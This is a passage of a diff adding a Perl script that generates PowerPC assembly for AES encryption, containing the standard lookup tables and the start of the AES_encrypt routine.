+$t1="r0";	# stay away from "r13";
+$t2="r14";
+$t3="r15";
+
+$acc00="r16";
+$acc01="r17";
+$acc02="r18";
+$acc03="r19";
+
+$acc04="r20";
+$acc05="r21";
+$acc06="r22";
+$acc07="r23";
+
+$acc08="r24";
+$acc09="r25";
+$acc10="r26";
+$acc11="r27";
+
+$acc12="r28";
+$acc13="r29";
+$acc14="r30";
+$acc15="r31";
+
+$mask80=$Tbl2;
+$mask1b=$Tbl3;
+
+$code.=<<___;
+.machine	"any"
+.text
+
+.align	7
+LAES_Te:
+	mflr	r0
+	bcl	20,31,\$+4
+	mflr	$Tbl0	;    vvvvv "distance" between . and 1st data entry
+	addi	$Tbl0,$Tbl0,`128-8`
+	mtlr	r0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+	.space	`64-9*4`
+LAES_Td:
+	mflr	r0
+	bcl	20,31,\$+4
+	mflr	$Tbl0	;    vvvvvvvv "distance" between . and 1st data entry
+	addi	$Tbl0,$Tbl0,`128-64-8+2048+256`
+	mtlr	r0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+	.space	`128-64-9*4`
+___
+&_data_word(
+	0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d,
+	0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554,
+	0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d,
+	0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a,
+	0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87,
+	0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b,
+	0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea,
+	0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b,
+	0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a,
+	0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f,
+	0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108,
+	0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f,
+	0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e,
+	0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5,
+	0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d,
+	0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f,
+	0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e,
+	0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb,
+	0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce,
+	0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497,
+	0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c,
+	0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed,
+	0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b,
+	0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a,
+	0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16,
+	0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594,
+	0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81,
+	0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3,
+	0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a,
+	0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504,
+	0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163,
+	0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d,
+	0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f,
+	0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739,
+	0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47,
+	0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395,
+	0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f,
+	0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883,
+	0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c,
+	0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76,
+	0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e,
+	0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4,
+	0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6,
+	0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b,
+	0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7,
+	0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0,
+	0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25,
+	0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818,
+	0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72,
+	0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651,
+	0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21,
+	0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85,
+	0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa,
+	0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12,
+	0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0,
+	0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9,
+	0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133,
+	0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7,
+	0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920,
+	0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a,
+	0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17,
+	0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8,
+	0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11,
+	0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a);
+$code.=<<___;
+.byte	0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
+.byte	0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
+.byte	0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
+.byte	0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
+.byte	0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
+.byte	0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
+.byte	0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
+.byte	0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
+.byte	0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
+.byte	0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
+.byte	0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
+.byte	0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
+.byte	0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
+.byte	0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
+.byte	0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
+.byte	0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
+.byte	0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
+.byte	0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
+.byte	0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
+.byte	0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
+.byte	0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
+.byte	0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
+.byte	0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
+.byte	0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
+.byte	0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
+.byte	0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
+.byte	0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
+.byte	0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
+.byte	0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
+.byte	0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
+.byte	0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
+.byte	0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
+___
+&_data_word(
+	0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96,
+	0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393,
+	0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25,
+	0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f,
+	0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1,
+	0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6,
+	0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da,
+	0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844,
+	0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd,
+	0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4,
+	0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45,
+	0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94,
+	0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7,
+	0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a,
+	0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5,
+	0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c,
+	0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1,
+	0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a,
+	0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75,
+	0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051,
+	0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46,
+	0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff,
+	0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77,
+	0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb,
+	0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000,
+	0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e,
+	0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927,
+	0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a,
+	0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e,
+	0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16,
+	0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d,
+	0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8,
+	0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd,
+	0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34,
+	0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163,
+	0xd731dcca, 0x42638510, 0x13972240, 0x84c61120,
+	0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d,
+	0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0,
+	0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422,
+	0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef,
+	0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36,
+	0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4,
+	0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662,
+	0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5,
+	0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3,
+	0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b,
+	0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8,
+	0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6,
+	0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6,
+	0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0,
+	0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815,
+	0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f,
+	0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df,
+	0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f,
+	0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e,
+	0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713,
+	0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89,
+	0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c,
+	0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf,
+	0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86,
+	0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f,
+	0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541,
+	0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190,
+	0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742);
+$code.=<<___;
+.byte	0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
+.byte	0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
+.byte	0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
+.byte	0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
+.byte	0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
+.byte	0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
+.byte	0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
+.byte	0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
+.byte	0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
+.byte	0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
+.byte	0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
+.byte	0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
+.byte	0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
+.byte	0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
+.byte	0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
+.byte	0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
+.byte	0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
+.byte	0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
+.byte	0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
+.byte	0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
+.byte	0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
+.byte	0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
+.byte	0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
+.byte	0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
+.byte	0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
+.byte	0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
+.byte	0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
+.byte	0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
+.byte	0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
+.byte	0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
+.byte	0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
+.byte	0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
+
+
+.globl	.AES_encrypt
+.align	7
+.AES_encrypt:
+	$STU	$sp,-$FRAME($sp)
+	mflr	r0
+
+	$PUSH	$out,`$FRAME-$SIZE_T*19`($sp)
+	$PUSH	r14,`$FRAME-$SIZE_T*18`($sp)
+	$PUSH	r15,`$FRAME-$SIZE_T*17`($sp)
+	$PUSH	r16,`$FRAME-$SIZE_T*16`($sp)
+	$PUSH	r17,`$FRAME-$SIZE_T*15`($sp)
+	$PUSH	r18,`$FRAME-$SIZE_T*14`($sp)
+	$PUSH	r19,`$FRAME-$SIZE_T*13`($sp)
+	$PUSH	r20,`$FRAME-$SIZE_T*12`($sp)
+	$PUSH	r21,`$FRAME-$SIZE_T*11`($sp)
+	$PUSH	r22,`$FRAME-$SIZE_T*10`($sp)
+	$PUSH	r23,`$FRAME-$SIZE_T*9`($sp)
+	$PUSH	r24,`$FRAME-$SIZE_T*8`($sp)
+	$PUSH	r25,`$FRAME-$SIZE_T*7`($sp)
+	$PUSH	r26,`$FRAME-$SIZE_T*6`($sp)
+	$PUSH	r27,`$FRAME-$SIZE_T*5`($sp)
+	$PUSH	r28,`$FRAME-$SIZE_T*4`($sp)
+	$PUSH	r29,`$FRAME-$SIZE_T*3`($sp)
+	$PUSH	r30,`$FRAME-$SIZE_T*2`($sp)
+	$PUSH	r31,`$FRAME-$SIZE_T*1`($sp)
+	$PUSH	r0,`$FRAME+$LRSAVE`($sp)
+
+	andi.	$t0,$inp,3
+	andi.	$t1,$out,3
+	or.	$t0,$t0,$t1
+	bne	Lenc_unaligned
+
+Lenc_unaligned_ok:
+___
+$code.=<<___ if (!$LITTLE_ENDIAN);
+	lwz	$s0,0($inp)
+	lwz	$s1,4($inp)
+	lwz	$s2,8($inp)
+	lwz	$s3,12($inp)
+___
+$code.=<<___ if ($LITTLE_ENDIAN);
+	lwz	$t0,0($inp)
+	lwz	$t1,4($inp)
+	lwz	$t2,8($inp)
+	lwz	$t3,12($inp)
+	rotlwi	$s0,$t0,8
+	rotlwi	$s1,$t1,8
+	rotlwi	$s2,$t2,8
+	rotlwi	$s3,$t3,8
+	rlwimi	$s0,$t0,24,0,7
+	rlwimi	$s1,$t1,24,0,7
+	rlwimi	$s2,$t2,24,0,7
+	rlwimi	$s3,$t3,24,0,7
+	rlwimi	$s0,$t0,24,16,23
+	rlwimi	$s1,$t1,24,16,23
+	rlwimi	$s2,$t2,24,16,23
+	rlwimi	$s3,$t3,24,16,23
+___
+$code.=<<___;
+	bl	LAES_Te
+	bl	Lppc_AES_encrypt_compact
+	$POP	$out,`$FRAME-$SIZE_T*19`($sp)
+___
+$code.=<<___ if ($LITTLE_ENDIAN);
+	rotlwi	$t0,$s0,8
+	rotlwi	$t1,$s1,8
+	rotlwi	$t2,$s2,8
+	rotlwi	$t3,$s3,8
+	rlwimi	$t0,$s0,24,0,7
+	rlwimi	$t1,$s1,24,0,7
+	rlwimi	$t2,$s2,24,0,7
+	rlwimi	$t3,$s3,24,0,7
+	rlwimi	$t0,$s0,24,16,23
+	rlwimi	$t1,$s1,24,16,23
+	rlwimi	$t2,$s2,24,16,23
+	rlwimi	$t3,$s3,24,16,23
+	stw	$t0,0($out)
+	stw	$t1,4($out)
+	stw	$t2,8($out)
+	stw	$t3,12($out)
+___
+$code.=<<___ if (!$LITTLE_ENDIAN);
+	stw	$s0,0($out)
+	stw	$s1,4($out)
+	stw	$s2,8($out)
+	stw	$s3,12($out)
+___
+$code.=<<___;
+	b	Lenc_done
+
+Lenc_unaligned:
+	subfic	$t0,$inp,4096
+	subfic	$t1,$out,4096
+	andi.	$t0,$t0,4096-16
+	beq	Lenc_xpage
+	andi.	$t1,$t1,4096-16
+	bne	Lenc_unaligned_ok
+
+Lenc_xpage:
+	lbz	$acc00,0($inp)
+	lbz	$acc01,1($inp)
+	lbz	$acc02,2($inp)
+	lbz	$s0,3($inp)
+	lbz	$acc04,4($inp)
+	lbz	$acc05,5($inp)
+	lbz	$acc06,6($inp)
+	lbz	$s1,7($inp)
+	lbz	$acc08,8($inp)
+	lbz	$acc09,9($inp)
+	lbz	$acc10,10($inp)
+	insrwi	$s0,$acc00,8,0
+	lbz	$s2,11($inp)
+	insrwi	$s1,$acc04,8,0
+	lbz	$acc12,12($inp)
+	insrwi	$s0,$acc01,8,8
+	lbz	$acc13,13($inp)
+	insrwi	$s1,$acc05,8,8
+	lbz	$acc14,14($inp)
+	insrwi	$s0,$acc02,8,16
+	lbz	$s3,15($inp)
+	insrwi	$s1,$acc06,8,16
+	insrwi	$s2,$acc08,8,0
+	insrwi	$s3,$acc12,8,0
+	insrwi	$s2,$acc09,8,8
+	insrwi	$s3,$acc13,8,8
+	insrwi	$s2,$acc10,8,16
+	insrwi	$s3,$acc14,8,16
+
+	bl	LAES_Te
+	bl	Lppc_AES_encrypt_compact
+	$POP	$out,`$FRAME-$SIZE_T*19`($sp)
+
+	extrwi	$acc00,$s0,8,0
+	extrwi	$acc01,$s0,8,8
+	stb	$acc00,0($out)
+	extrwi	$acc02,$s0,8,16
+	stb	$acc01,1($out)
+	stb	$acc02,2($out)
+	extrwi	$acc04,$s1,8,0
+	stb	$s0,3($out)
+	extrwi	$acc05,$s1,8,8
+	stb	$acc04,4($out)
+	extrwi	$acc06,$s1,8,16
+	stb	$acc05,5($out)
+	stb	$acc06,6($out)
+	extrwi	$acc08,$s2,8,0
+	stb	$s1,7($out)
+	extrwi	$acc09,$s2,8,8
+	stb	$acc08,8($out)
+	extrwi	$acc10,$s2,8,16
+	stb	$acc09,9($out)
+	stb	$acc10,10($out)
+	extrwi	$acc12,$s3,8,0
+	stb	$s2,11($out)
+	extrwi	$acc13,$s3,8,8
+	stb	$acc12,12($out)
+	extrwi	$acc14,$s3,8,16
+	stb	$acc13,13($out)
+	stb	$acc14,14($out)
+	stb	$s3,15($out)
+
+Lenc_done:
+	$POP	r0,`$FRAME+$LRSAVE`($sp)
+	$POP	r14,`$FRAME-$SIZE_T*18`($sp)
+	$POP	r15,`$FRAME-$SIZE_T*17`($sp)
+	$POP	r16,`$FRAME-$SIZE_T*16`($sp)
+	$POP	r17,`$FRAME-$SIZE_T*15`($sp)
+	$POP	r18,`$FRAME-$SIZE_T*14`($sp)
+	$POP	r19,`$FRAME-$SIZE_T*13`($sp)
+	$POP	r20,`$FRAME-$SIZE_T*12`($sp)
+	$POP	r21,`$FRAME-$SIZE_T*11`($sp)
+	$POP	r22,`$FRAME-$SIZE_T*10`($sp)
+	$POP	r23,`$FRAME-$SIZE_T*9`($sp)
+	$POP	r24,`$FRAME-$SIZE_T*8`($sp)
+	$POP	r25,`$FRAME-$SIZE_T*7`($sp)
+	$POP	r26,`$FRAME-$SIZE_T*6`($sp)
+	$POP	r27,`$FRAME-$SIZE_T*5`($sp)
+	$POP	r28,`$FRAME-$SIZE_T*4`($sp)
+	$POP	r29,`$FRAME-$SIZE_T*3`($sp)
+	$POP	r30,`$FRAME-$SIZE_T*2`($sp)
+	$POP	r31,`$FRAME-$SIZE_T*1`($sp)
+	mtlr	r0
+	addi	$sp,$sp,$FRAME
+	blr
+	.long	0
+	.byte	0,12,4,1,0x80,18,3,0
+	.long	0
+
+.align	5
+Lppc_AES_encrypt:
+	lwz	$acc00,240($key)
+	addi	$Tbl1,$Tbl0,3
+	lwz	$t0,0($key)
+	addi	$Tbl2,$Tbl0,2
+	lwz	$t1,4($key)
+	addi	$Tbl3,$Tbl0,1
+	lwz	$t2,8($key)
+	addi	$acc00,$acc00,-1
+	lwz	$t3,12($key)
+	addi	$key,$key,16
+	xor	$s0,$s0,$t0
+	xor	$s1,$s1,$t1
+	xor	$s2,$s2,$t2
+	xor	$s3,$s3,$t3
+	mtctr	$acc00
+.align	4
+Lenc_loop:
+	rlwinm	$acc00,$s0,`32-24+3`,21,28
+	rlwinm	$acc01,$s1,`32-24+3`,21,28
+	rlwinm	$acc02,$s2,`32-24+3`,21,28
+	rlwinm	$acc03,$s3,`32-24+3`,21,28
+	lwz	$t0,0($key)
+	rlwinm	$acc04,$s1,`32-16+3`,21,28
+	lwz	$t1,4($key)
+	rlwinm	$acc05,$s2,`32-16+3`,21,28
+	lwz	$t2,8($key)
+	rlwinm	$acc06,$s3,`32-16+3`,21,28
+	lwz	$t3,12($key)
+	rlwinm	$acc07,$s0,`32-16+3`,21,28
+	lwzx	$acc00,$Tbl0,$acc00
+	rlwinm	$acc08,$s2,`32-8+3`,21,28
+	lwzx	$acc01,$Tbl0,$acc01
+	rlwinm	$acc09,$s3,`32-8+3`,21,28
+	lwzx	$acc02,$Tbl0,$acc02
+	rlwinm	$acc10,$s0,`32-8+3`,21,28
+	lwzx	$acc03,$Tbl0,$acc03
+	rlwinm	$acc11,$s1,`32-8+3`,21,28
+	lwzx	$acc04,$Tbl1,$acc04
+	rlwinm	$acc12,$s3,`0+3`,21,28
+	lwzx	$acc05,$Tbl1,$acc05
+	rlwinm	$acc13,$s0,`0+3`,21,28
+	lwzx	$acc06,$Tbl1,$acc06
+	rlwinm	$acc14,$s1,`0+3`,21,28
+	lwzx	$acc07,$Tbl1,$acc07
+	rlwinm	$acc15,$s2,`0+3`,21,28
+	lwzx	$acc08,$Tbl2,$acc08
+	xor	$t0,$t0,$acc00
+	lwzx	$acc09,$Tbl2,$acc09
+	xor	$t1,$t1,$acc01
+	lwzx	$acc10,$Tbl2,$acc10
+	xor	$t2,$t2,$acc02
+	lwzx	$acc11,$Tbl2,$acc11
+	xor	$t3,$t3,$acc03
+	lwzx	$acc12,$Tbl3,$acc12
+	xor	$t0,$t0,$acc04
+	lwzx	$acc13,$Tbl3,$acc13
+	xor	$t1,$t1,$acc05
+	lwzx	$acc14,$Tbl3,$acc14
+	xor	$t2,$t2,$acc06
+	lwzx	$acc15,$Tbl3,$acc15
+	xor	$t3,$t3,$acc07
+	xor	$t0,$t0,$acc08
+	xor	$t1,$t1,$acc09
+	xor	$t2,$t2,$acc10
+	xor	$t3,$t3,$acc11
+	xor	$s0,$t0,$acc12
+	xor	$s1,$t1,$acc13
+	xor	$s2,$t2,$acc14
+	xor	$s3,$t3,$acc15
+	addi	$key,$key,16
+	bdnz-	Lenc_loop
+
+	addi	$Tbl2,$Tbl0,2048
+	nop
+	lwz	$t0,0($key)
+	rlwinm	$acc00,$s0,`32-24`,24,31
+	lwz	$t1,4($key)
+	rlwinm	$acc01,$s1,`32-24`,24,31
+	lwz	$t2,8($key)
+	rlwinm	$acc02,$s2,`32-24`,24,31
+	lwz	$t3,12($key)
+	rlwinm	$acc03,$s3,`32-24`,24,31
+	lwz	$acc08,`2048+0`($Tbl0)	! prefetch Te4
+	rlwinm	$acc04,$s1,`32-16`,24,31
+	lwz	$acc09,`2048+32`($Tbl0)
+	rlwinm	$acc05,$s2,`32-16`,24,31
+	lwz	$acc10,`2048+64`($Tbl0)
+	rlwinm	$acc06,$s3,`32-16`,24,31
+	lwz	$acc11,`2048+96`($Tbl0)
+	rlwinm	$acc07,$s0,`32-16`,24,31
+	lwz	$acc12,`2048+128`($Tbl0)
+	rlwinm	$acc08,$s2,`32-8`,24,31
+	lwz	$acc13,`2048+160`($Tbl0)
+	rlwinm	$acc09,$s3,`32-8`,24,31
+	lwz	$acc14,`2048+192`($Tbl0)
+	rlwinm	$acc10,$s0,`32-8`,24,31
+	lwz	$acc15,`2048+224`($Tbl0)
+	rlwinm	$acc11,$s1,`32-8`,24,31
+	lbzx	$acc00,$Tbl2,$acc00
+	rlwinm	$acc12,$s3,`0`,24,31
+	lbzx	$acc01,$Tbl2,$acc01
+	rlwinm	$acc13,$s0,`0`,24,31
+	lbzx	$acc02,$Tbl2,$acc02
+	rlwinm	$acc14,$s1,`0`,24,31
+	lbzx	$acc03,$Tbl2,$acc03
+	rlwinm	$acc15,$s2,`0`,24,31
+	lbzx	$acc04,$Tbl2,$acc04
+	rlwinm	$s0,$acc00,24,0,7
+	lbzx	$acc05,$Tbl2,$acc05
+	rlwinm	$s1,$acc01,24,0,7
+	lbzx	$acc06,$Tbl2,$acc06
+	rlwinm	$s2,$acc02,24,0,7
+	lbzx	$acc07,$Tbl2,$acc07
+	rlwinm	$s3,$acc03,24,0,7
+	lbzx	$acc08,$Tbl2,$acc08
